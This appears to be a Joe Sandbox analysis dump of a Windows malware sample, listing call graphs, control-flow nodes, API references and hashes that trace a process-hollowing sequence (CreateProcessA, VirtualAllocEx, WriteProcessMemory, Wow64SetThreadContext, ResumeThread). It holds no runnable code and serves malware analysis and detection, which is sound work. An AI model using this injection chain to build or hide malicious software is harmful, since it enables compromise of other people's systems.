24183 7738953 2 API calls 24182->24183 24184 77383d1 2 API calls 24182->24184 24185 7737ff0 2 API calls 24182->24185 24186 773829c 2 API calls 24182->24186 24187 77380c3 2 API calls 24182->24187 24188 7738242 2 API calls 24182->24188 24189 7738087 2 API calls 24182->24189 24190 7738125 2 API calls 24182->24190 24191 773840b 2 API calls 24182->24191 24192 77386c9 2 API calls 24182->24192 24193 7737b96 24182->24193 24194 773848e 2 API calls 24182->24194 24183->24193 24184->24193 24185->24193 24186->24193 24187->24193 24188->24193 24189->24193 24190->24193 24191->24193 24192->24193 24193->24148 24194->24193 24196 77384f4 24195->24196 24244 7734660 24196->24244 24248 7734659 24196->24248 24197 7738066 24197->24164 24201 7738248 24200->24201 24252 77344d7 24201->24252 24256 77344d8 24201->24256 24202 7738066 24202->24164 24206 77380d8 24205->24206 24207 7738066 24206->24207 24208 77344d7 ResumeThread 24206->24208 24209 77344d8 ResumeThread 24206->24209 24207->24164 24208->24207 24209->24207 24260 7734584 24210->24260 24264 7734588 24210->24264 24211 77382bb 24211->24164 24268 77349a8 24214->24268 24272 773499d 24214->24272 24220 7734584 Wow64SetThreadContext 24218->24220 24221 7734588 Wow64SetThreadContext 24218->24221 24219 77383eb 24219->24164 24220->24219 24221->24219 24276 7734810 24222->24276 24280 7734808 24222->24280 24223 7738975 24227 7738709 24226->24227 24284 7734720 24227->24284 24288 7734719 24227->24288 24228 773874d 24228->24164 24233 7734720 WriteProcessMemory 24231->24233 24234 7734719 WriteProcessMemory 24231->24234 24232 77386aa 24233->24232 24234->24232 24236 77383d0 24235->24236 24238 7734584 Wow64SetThreadContext 24236->24238 24239 7734588 Wow64SetThreadContext 24236->24239 24237 77383eb 24237->24164 24238->24237 24239->24237 24242 7734720 WriteProcessMemory 24240->24242 24243 7734719 WriteProcessMemory 24240->24243 24241 7738153 24241->24164 24242->24241 24243->24241 24245 77346a0 VirtualAllocEx 24244->24245 24247 77346dd 24245->24247 24247->24197 24249 7734660 VirtualAllocEx 24248->24249 24251 77346dd 24249->24251 24251->24197 24253 77344d8 ResumeThread 24252->24253 24255 7734549 24253->24255 24255->24202 24257 7734518 ResumeThread 24256->24257 24259 7734549 24257->24259 24259->24202 24261 7734588 Wow64SetThreadContext 24260->24261 24263 7734615 24261->24263 24263->24211 24265 773458f Wow64SetThreadContext 24264->24265 24267 7734615 24265->24267 24267->24211 24269 7734a31 24268->24269 24269->24269 24270 7734b96 CreateProcessA 24269->24270 24271 7734bf3 24270->24271 24273 77349a8 24272->24273 24273->24273 24274 7734b96 CreateProcessA 24273->24274 24275 7734bf3 24274->24275 24277 773485b ReadProcessMemory 24276->24277 24279 773489f 24277->24279 24279->24223 24281 7734810 ReadProcessMemory 24280->24281 24283 773489f 24281->24283 24283->24223 24285 7734768 WriteProcessMemory 24284->24285 24287 77347bf 24285->24287 24287->24228 24289 7734720 WriteProcessMemory 24288->24289 24291 77347bf 24289->24291 24291->24228 24292 7734e9b 24293 7734dc4 24292->24293 24294 7734dd3 24293->24294 24295 7737b50 12 API calls 24293->24295 24296 7737b58 12 API calls 24293->24296 24297 7737bfe 12 API calls 24293->24297 24295->24293 24296->24293 24297->24293 24298 7738db8 24299 7738f43 24298->24299 24301 7738dde 24298->24301 24301->24299 24302 773594c 24301->24302 24303 7739038 PostMessageW 24302->24303 24304 77390a4 24303->24304 24304->24301 24305 2ecd040 24306 2ecd086 GetCurrentProcess 24305->24306 24308 2ecd0d8 GetCurrentThread 24306->24308 24309 2ecd0d1 24306->24309 24310 2ecd115 GetCurrentProcess 24308->24310 24311 2ecd10e 24308->24311 24309->24308 24312 2ecd14b 24310->24312 24311->24310 24313 2ecd173 GetCurrentThreadId 24312->24313 24314 2ecd1a4 24313->24314 24315 2ecacb0 24316 2ecacbf 24315->24316 24319 2ecada8 24315->24319 24324 2ecad97 24315->24324 24320 2ecaddc 24319->24320 24321 2ecadb9 24319->24321 24320->24316 24321->24320 24322 2ecafe0 GetModuleHandleW 24321->24322 24323 2ecb00d 24322->24323 24323->24316 24325 2ecadb9 24324->24325 24326 2ecaddc 24324->24326 24325->24326 24327 2ecafe0 GetModuleHandleW 24325->24327 24326->24316 24328 2ecb00d 24327->24328 24328->24316 24329 2ecd690 DuplicateHandle 24330 2ecd726 24329->24330
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 47e8c22e7e149350070087a7043ecc8bce8904b48265608d6c7f650a477cb42b
                                                                                • Instruction ID: 59e0c889530291c6109caeddc5841e2a48caca342030ead8060f74b93590ad77
                                                                                • Opcode Fuzzy Hash: 47e8c22e7e149350070087a7043ecc8bce8904b48265608d6c7f650a477cb42b
                                                                                • Instruction Fuzzy Hash: 14A001D08BF112C180055C7068558F4902C120B0D4F443400A16A2350389A68019406B

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 294 2ecd030-2ecd0cf GetCurrentProcess 298 2ecd0d8-2ecd10c GetCurrentThread 294->298 299 2ecd0d1-2ecd0d7 294->299 300 2ecd10e-2ecd114 298->300 301 2ecd115-2ecd149 GetCurrentProcess 298->301 299->298 300->301 303 2ecd14b-2ecd151 301->303 304 2ecd152-2ecd16d call 2ecd618 301->304 303->304 307 2ecd173-2ecd1a2 GetCurrentThreadId 304->307 308 2ecd1ab-2ecd20d 307->308 309 2ecd1a4-2ecd1aa 307->309 309->308
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 02ECD0BE
                                                                                • GetCurrentThread.KERNEL32 ref: 02ECD0FB
                                                                                • GetCurrentProcess.KERNEL32 ref: 02ECD138
                                                                                • GetCurrentThreadId.KERNEL32 ref: 02ECD191
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2061130442.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ec0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID:
                                                                                • API String ID: 2063062207-0
                                                                                • Opcode ID: 9e125f5b0a04faf9a198d32bcf61b34d8d8f7b5c34e96de9a66480f6521957e8
                                                                                • Instruction ID: 76f02c4d71bfab89efadfe94fd4ca59b305e84febe51a4da4aaed22627bc6f19
                                                                                • Opcode Fuzzy Hash: 9e125f5b0a04faf9a198d32bcf61b34d8d8f7b5c34e96de9a66480f6521957e8
                                                                                • Instruction Fuzzy Hash: 8E5167B09003498FDB54DFA9DA48BAEBBF1EF48304F24C4ADD509A7360D7399885CB65

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 316 2ecd040-2ecd0cf GetCurrentProcess 320 2ecd0d8-2ecd10c GetCurrentThread 316->320 321 2ecd0d1-2ecd0d7 316->321 322 2ecd10e-2ecd114 320->322 323 2ecd115-2ecd149 GetCurrentProcess 320->323 321->320 322->323 325 2ecd14b-2ecd151 323->325 326 2ecd152-2ecd16d call 2ecd618 323->326 325->326 329 2ecd173-2ecd1a2 GetCurrentThreadId 326->329 330 2ecd1ab-2ecd20d 329->330 331 2ecd1a4-2ecd1aa 329->331 331->330
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 02ECD0BE
                                                                                • GetCurrentThread.KERNEL32 ref: 02ECD0FB
                                                                                • GetCurrentProcess.KERNEL32 ref: 02ECD138
                                                                                • GetCurrentThreadId.KERNEL32 ref: 02ECD191
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2061130442.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ec0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID:
                                                                                • API String ID: 2063062207-0
                                                                                • Opcode ID: 4662f4a11ea8b55f97fec3e70ef5316e46a1f1ac982e77e23f3b6c1d25ce4522
                                                                                • Instruction ID: 5d682f5c3c6024dbc97812e2da255766383ae0c8b92636ea2e306faf294bdcd5
                                                                                • Opcode Fuzzy Hash: 4662f4a11ea8b55f97fec3e70ef5316e46a1f1ac982e77e23f3b6c1d25ce4522
                                                                                • Instruction Fuzzy Hash: 405155B09003098FDB54DFA9DA48BAEBBF1EF48314F20846DD509A7360D739A884CB65

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 434 773499d-7734a3d 437 7734a76-7734a96 434->437 438 7734a3f-7734a49 434->438 445 7734a98-7734aa2 437->445 446 7734acf-7734afe 437->446 438->437 439 7734a4b-7734a4d 438->439 440 7734a70-7734a73 439->440 441 7734a4f-7734a59 439->441 440->437 443 7734a5b 441->443 444 7734a5d-7734a6c 441->444 443->444 444->444 447 7734a6e 444->447 445->446 448 7734aa4-7734aa6 445->448 452 7734b00-7734b0a 446->452 453 7734b37-7734bf1 CreateProcessA 446->453 447->440 450 7734ac9-7734acc 448->450 451 7734aa8-7734ab2 448->451 450->446 454 7734ab6-7734ac5 451->454 455 7734ab4 451->455 452->453 457 7734b0c-7734b0e 452->457 466 7734bf3-7734bf9 453->466 467 7734bfa-7734c80 453->467 454->454 456 7734ac7 454->456 455->454 456->450 458 7734b31-7734b34 457->458 459 7734b10-7734b1a 457->459 458->453 461 7734b1e-7734b2d 459->461 462 7734b1c 459->462 461->461 464 7734b2f 461->464 462->461 464->458 466->467 477 7734c82-7734c86 467->477 478 7734c90-7734c94 467->478 477->478 479 7734c88 477->479 480 7734c96-7734c9a 478->480 481 7734ca4-7734ca8 478->481 479->478 480->481 482 7734c9c 480->482 483 7734caa-7734cae 481->483 484 7734cb8-7734cbc 481->484 482->481 483->484 487 7734cb0 483->487 485 7734cce-7734cd5 484->485 486 7734cbe-7734cc4 484->486 488 7734cd7-7734ce6 485->488 489 7734cec 485->489 486->485 487->484 488->489 491 7734ced 489->491 491->491
                                                                                APIs
                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07734BDE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: a25751c2e6d643f5e0830aef4f1849122ec20ca8172bdd2a4a142fd9c8e6310f
                                                                                • Instruction ID: dcf1242a60bf71f3c95850963f8efe872bc3b81b2900a02d75eaabd6dfeb3556
                                                                                • Opcode Fuzzy Hash: a25751c2e6d643f5e0830aef4f1849122ec20ca8172bdd2a4a142fd9c8e6310f
                                                                                • Instruction Fuzzy Hash: 83A18DB1D0035ACFDB28CFA8C840BEDBBB2BF45350F148569E819A7251DB749985CF92

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 492 77349a8-7734a3d 494 7734a76-7734a96 492->494 495 7734a3f-7734a49 492->495 502 7734a98-7734aa2 494->502 503 7734acf-7734afe 494->503 495->494 496 7734a4b-7734a4d 495->496 497 7734a70-7734a73 496->497 498 7734a4f-7734a59 496->498 497->494 500 7734a5b 498->500 501 7734a5d-7734a6c 498->501 500->501 501->501 504 7734a6e 501->504 502->503 505 7734aa4-7734aa6 502->505 509 7734b00-7734b0a 503->509 510 7734b37-7734bf1 CreateProcessA 503->510 504->497 507 7734ac9-7734acc 505->507 508 7734aa8-7734ab2 505->508 507->503 511 7734ab6-7734ac5 508->511 512 7734ab4 508->512 509->510 514 7734b0c-7734b0e 509->514 523 7734bf3-7734bf9 510->523 524 7734bfa-7734c80 510->524 511->511 513 7734ac7 511->513 512->511 513->507 515 7734b31-7734b34 514->515 516 7734b10-7734b1a 514->516 515->510 518 7734b1e-7734b2d 516->518 519 7734b1c 516->519 518->518 521 7734b2f 518->521 519->518 521->515 523->524 534 7734c82-7734c86 524->534 535 7734c90-7734c94 524->535 534->535 536 7734c88 534->536 537 7734c96-7734c9a 535->537 538 7734ca4-7734ca8 535->538 536->535 537->538 539 7734c9c 537->539 540 7734caa-7734cae 538->540 541 7734cb8-7734cbc 538->541 539->538 540->541 544 7734cb0 540->544 542 7734cce-7734cd5 541->542 543 7734cbe-7734cc4 541->543 545 7734cd7-7734ce6 542->545 546 7734cec 542->546 543->542 544->541 545->546 548 7734ced 546->548 548->548
                                                                                APIs
                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07734BDE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: cf6339ecb7ae2d23bc10455b1593444ac264b9aab73e4b467537c2649019206c
                                                                                • Instruction ID: 38aabd9979db572a2ef8096dad740c828e367274b5e82d36739d8d704bca05eb
                                                                                • Opcode Fuzzy Hash: cf6339ecb7ae2d23bc10455b1593444ac264b9aab73e4b467537c2649019206c
                                                                                • Instruction Fuzzy Hash: 4E918CB1D0025ACFDB28CFA8C840BEDBBB2BF48350F148569D819A7251DB749985CF92

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 549 2ecada8-2ecadb7 550 2ecadb9-2ecadc6 call 2eca0cc 549->550 551 2ecade3-2ecade7 549->551 558 2ecaddc 550->558 559 2ecadc8 550->559 552 2ecade9-2ecadf3 551->552 553 2ecadfb-2ecae3c 551->553 552->553 560 2ecae3e-2ecae46 553->560 561 2ecae49-2ecae57 553->561 558->551 604 2ecadce call 2ecb040 559->604 605 2ecadce call 2ecb031 559->605 560->561 562 2ecae59-2ecae5e 561->562 563 2ecae7b-2ecae7d 561->563 566 2ecae69 562->566 567 2ecae60-2ecae67 call 2eca0d8 562->567 565 2ecae80-2ecae87 563->565 564 2ecadd4-2ecadd6 564->558 568 2ecaf18-2ecafd8 564->568 569 2ecae89-2ecae91 565->569 570 2ecae94-2ecae9b 565->570 572 2ecae6b-2ecae79 566->572 567->572 599 2ecafda-2ecafdd 568->599 600 2ecafe0-2ecb00b GetModuleHandleW 568->600 569->570 573 2ecae9d-2ecaea5 570->573 574 2ecaea8-2ecaeaa call 2eca0e8 570->574 572->565 573->574 578 2ecaeaf-2ecaeb1 574->578 580 2ecaebe-2ecaec3 578->580 581 2ecaeb3-2ecaebb 578->581 582 2ecaec5-2ecaecc 580->582 583 2ecaee1-2ecaeee 580->583 581->580 582->583 585 2ecaece-2ecaede call 2eca0f8 call 2eca108 582->585 589 2ecaef0-2ecaf0e 583->589 590 2ecaf11-2ecaf17 583->590 585->583 589->590 599->600 601 2ecb00d-2ecb013 600->601 602 2ecb014-2ecb028 600->602 601->602 604->564 605->564
                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 02ECAFFE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2061130442.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ec0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: 894517dc291da9dc5fa303853179796ba144acea1e24e9a8dd651d5c16fa91f8
                                                                                • Instruction ID: 130bb81b951c5c65f0526e9d68e68f90dbff6dc4279e3bc9437bad24ff7db9ba
                                                                                • Opcode Fuzzy Hash: 894517dc291da9dc5fa303853179796ba144acea1e24e9a8dd651d5c16fa91f8
                                                                                • Instruction Fuzzy Hash: A27146B0A00B098FD724DFA9D54579ABBF5BF48308F10892DE58AD7B50D735E84ACB90

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 606 2ec590c-2ec59d9 CreateActCtxA 608 2ec59db-2ec59e1 606->608 609 2ec59e2-2ec5a3c 606->609 608->609 616 2ec5a3e-2ec5a41 609->616 617 2ec5a4b-2ec5a4f 609->617 616->617 618 2ec5a60-2ec5a90 617->618 619 2ec5a51-2ec5a5d 617->619 623 2ec5a42-2ec5a47 618->623 624 2ec5a92-2ec5b14 618->624 619->618 623->617
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 02EC59C9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2061130442.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ec0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: ccda4bd8042ad14a7c10fb5681b6c0269d528e3b32fef91c167ec4afedcc7204
                                                                                • Instruction ID: ee1b9809ddd624ddc05fb15d9a177ecef500c59e7190d3473733945e33d73d0e
                                                                                • Opcode Fuzzy Hash: ccda4bd8042ad14a7c10fb5681b6c0269d528e3b32fef91c167ec4afedcc7204
                                                                                • Instruction Fuzzy Hash: 414113B0C0061DCBDB24DFAAC984BDEBBB1BF49304F60805AD519BB251DB75694ACF50

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 627 2ec44c4-2ec59d9 CreateActCtxA 630 2ec59db-2ec59e1 627->630 631 2ec59e2-2ec5a3c 627->631 630->631 638 2ec5a3e-2ec5a41 631->638 639 2ec5a4b-2ec5a4f 631->639 638->639 640 2ec5a60-2ec5a90 639->640 641 2ec5a51-2ec5a5d 639->641 645 2ec5a42-2ec5a47 640->645 646 2ec5a92-2ec5b14 640->646 641->640 645->639
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 02EC59C9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2061130442.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ec0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: 8a6f738465cbbd0f24f99f0fb3542c7123babdaf92f9a578af4b4745a145ad3f
                                                                                • Instruction ID: c21b86500182e57fcf05028bb45c430469360adaf46779255f96888c1054b29f
                                                                                • Opcode Fuzzy Hash: 8a6f738465cbbd0f24f99f0fb3542c7123babdaf92f9a578af4b4745a145ad3f
                                                                                • Instruction Fuzzy Hash: 304102B0C0061DCBDB24DFAAC944BDEBBB5BF49304F60805AD519BB250DB75694ACF90

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 649 7734719-773476e 652 7734770-773477c 649->652 653 773477e-77347bd WriteProcessMemory 649->653 652->653 655 77347c6-77347f6 653->655 656 77347bf-77347c5 653->656 656->655
                                                                                APIs
                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 077347B0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: caae566fc0ccad734b138a655fb4f81804aba814ed0e7e4e22651963118a001b
                                                                                • Instruction ID: c7e4c986333fd79eb7a451ef262850b4a87f5239d0645e05341f826dd4c86187
                                                                                • Opcode Fuzzy Hash: caae566fc0ccad734b138a655fb4f81804aba814ed0e7e4e22651963118a001b
                                                                                • Instruction Fuzzy Hash: 1B3176B19003499FCB14CFA9C884BEEBFF5FF49310F10842AE958A7241C778A940CBA0

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 660 7734808-773489d ReadProcessMemory 664 77348a6-77348d6 660->664 665 773489f-77348a5 660->665 665->664
                                                                                APIs
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07734890
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0
                                                                                • Opcode ID: 6c1e514b8c7582996badd0150f8e29d7d23c0d34460f7bfcb1fdffde51ffcb94
                                                                                • Instruction ID: 31bdc0470332577c1e2fe10ff336789f0e9907cc57eb27f3b35967c9b50ba1a1
                                                                                • Opcode Fuzzy Hash: 6c1e514b8c7582996badd0150f8e29d7d23c0d34460f7bfcb1fdffde51ffcb94
                                                                                • Instruction Fuzzy Hash: F7215AB1C103499FCB14DFAAC884AEEBFF5FF49310F10882AE558A7251C779A541CBA4

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 681 7734720-773476e 683 7734770-773477c 681->683 684 773477e-77347bd WriteProcessMemory 681->684 683->684 686 77347c6-77347f6 684->686 687 77347bf-77347c5 684->687 687->686
                                                                                APIs
                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 077347B0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: 4f0c31c75fd7df1d074c18171b3221cd5a2ca35345f2eb89f3c33cdeacd1ebe3
                                                                                • Instruction ID: ec0d21294b8779ec268e5ec956261cece435d9e9660dbbc02595c9c2d0fdc05a
                                                                                • Opcode Fuzzy Hash: 4f0c31c75fd7df1d074c18171b3221cd5a2ca35345f2eb89f3c33cdeacd1ebe3
                                                                                • Instruction Fuzzy Hash: 092169B59003499FCB10DFA9C884BEEBBF5FF48310F108829E919A7240C778A940CBA0

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 669 7734584-7734586 670 7734588-773458e 669->670 671 773458f-77345d3 669->671 670->671 673 77345e3-7734613 Wow64SetThreadContext 671->673 674 77345d5-77345e1 671->674 676 7734615-773461b 673->676 677 773461c-773464c 673->677 674->673 676->677
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07734606
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: ca0317ac282448fda331b04d583792f8d8f4107250b9763e4e2654629e089e9c
                                                                                • Instruction ID: 6b5a80477cef6b30820d69cd461417ca16250fa5e17c2b47858d47a879737470
                                                                                • Opcode Fuzzy Hash: ca0317ac282448fda331b04d583792f8d8f4107250b9763e4e2654629e089e9c
                                                                                • Instruction Fuzzy Hash: 1A2159B1D00249CFDB14DFAAC4857EEBFF5EF48314F60842AD519A7241C778A945CBA4

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 691 7734588-77345d3 694 77345e3-7734613 Wow64SetThreadContext 691->694 695 77345d5-77345e1 691->695 697 7734615-773461b 694->697 698 773461c-773464c 694->698 695->694 697->698
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07734606
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: f784a8acc144c568a80b8d049295ba93f2023bcce41b3d1405d2ada8e09adcb1
                                                                                • Instruction ID: d3af5490d21a035d47c77cdeaf83a4600b0bade03569b3260f5d24656c455646
                                                                                • Opcode Fuzzy Hash: f784a8acc144c568a80b8d049295ba93f2023bcce41b3d1405d2ada8e09adcb1
                                                                                • Instruction Fuzzy Hash: F62135B1D002098FDB14DFAAC4857EEBBF4EF48314F50842AD519A7241CB78A984CFA5
                                                                                APIs
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07734890
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0
                                                                                • Opcode ID: d8670bed791321b8bf80047f85159d30599fd7034c36aa8db5e995f1a82541b8
                                                                                • Instruction ID: 3ac51e329904b715f0d867d8f2f65657df151c9485f6b94d7c10df3dbae23b05
                                                                                • Opcode Fuzzy Hash: d8670bed791321b8bf80047f85159d30599fd7034c36aa8db5e995f1a82541b8
                                                                                • Instruction Fuzzy Hash: 7A2139B1C003499FCB10DFAAC880AEEFBF5FF48310F508829E559A7250C778A540CBA0
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02ECD717
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2061130442.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ec0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 1306f6ac29c545e6f1e51ecff34c2f2fd0030b844d61d5e6ddf8583391080c3c
                                                                                • Instruction ID: eb340a981568ab65f9a0a834c6440a1316aa87ecda61b46aae8e92d7e6f62fd7
                                                                                • Opcode Fuzzy Hash: 1306f6ac29c545e6f1e51ecff34c2f2fd0030b844d61d5e6ddf8583391080c3c
                                                                                • Instruction Fuzzy Hash: 0A21E3B59002089FDB10CF99D985AEEBBF5FB48314F14842AE918B3310D379A951CFA0
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02ECD717
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2061130442.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2ec0000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: df5adaeef00acf020b9c5b879b664ae113f0ca9a2975a2e180f9e7137a681a55
                                                                                • Instruction ID: 92b190f429551307929a8036374dc75eb7c0a67dd3b4bd1f5347aa391b27fc12
                                                                                • Opcode Fuzzy Hash: df5adaeef00acf020b9c5b879b664ae113f0ca9a2975a2e180f9e7137a681a55
                                                                                • Instruction Fuzzy Hash: 8E21E4B59002489FDB10CF9AD984ADEFBF8FB48310F14842AE918A3310C379A950CFA0
                                                                                APIs
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 077346CE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2065020785.0000000007730000.00000040.00000800.00020000.00000000.sdmp, Offset: 07730000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7730000_WIpGif4IRrFfamQ.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 0a133bfc7e28f157aa0376c02f336a6b325342deadc39086e6cf4807fafa9da4
                                                                                • Instruction ID: 19d3a9c667d1d2f162ba193bcadf896982b23bd4f8085631cb513c057d71beb7
